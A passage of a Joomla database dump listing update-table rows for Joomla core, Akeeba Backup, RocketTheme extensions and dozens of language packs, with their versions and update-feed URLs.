Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8641,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8642,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8643,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8644,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8645,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8646,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8647,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8648,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8649,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8650,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8651,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8652,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8653,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8654,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8655,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8656,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8657,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8658,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8659,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8660,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8661,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8662,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8663,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8664,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8665,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8666,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8667,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8668,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8669,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8670,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8671,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8672,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8673,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8674,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8675,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8676,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8677,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8678,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8679,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8680,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8681,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8682,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8683,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8684,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8685,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8686,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8687,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8688,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8689,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8690,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8691,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8692,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8693,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8694,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8695,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8696,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8697,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8698,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8699,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8700,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8701,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8702,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8703,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8704,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8705,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8706,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8707,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8708,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8709,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8710,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8711,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8712,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8713,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8714,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8715,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8716,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8717,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8718,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8719,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8720,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8721,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8722,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8723,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8724,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8725,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8726,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8727,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8728,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8729,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8730,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8731,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8732,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8733,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8734,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8735,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8736,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8737,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8738,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8739,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8740,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8741,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8742,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8743,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8744,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8745,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8746,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8747,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8748,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8749,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8750,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8751,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8752,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8753,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8754,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8755,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8756,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8757,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8758,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8759,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8760,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8761,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8762,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8763,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8764,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8765,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8766,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8767,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8768,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8769,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8770,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8771,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8772,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.9','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-9.html			\n		',''),(8773,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8774,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(8776,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8777,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8778,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8779,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8780,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8781,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8782,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8783,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8784,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8785,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8786,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8787,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8788,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8789,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8790,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8791,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8792,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8793,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8794,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8795,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8796,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8797,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8798,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8799,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8800,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8801,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8802,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8803,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8804,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8805,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8806,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8807,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8808,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8809,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8810,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8811,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8812,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8813,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8814,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8815,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8816,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8817,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8818,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8819,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8820,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8821,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8822,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8823,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8824,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8825,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8826,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8827,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8828,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8829,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8830,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8831,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8832,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8833,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8834,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8835,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8836,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8837,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8838,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8839,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8840,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8841,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8842,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8843,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8844,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8845,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8846,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8847,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8848,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8849,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8850,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8851,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8852,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8853,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8854,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8855,57,0,'English 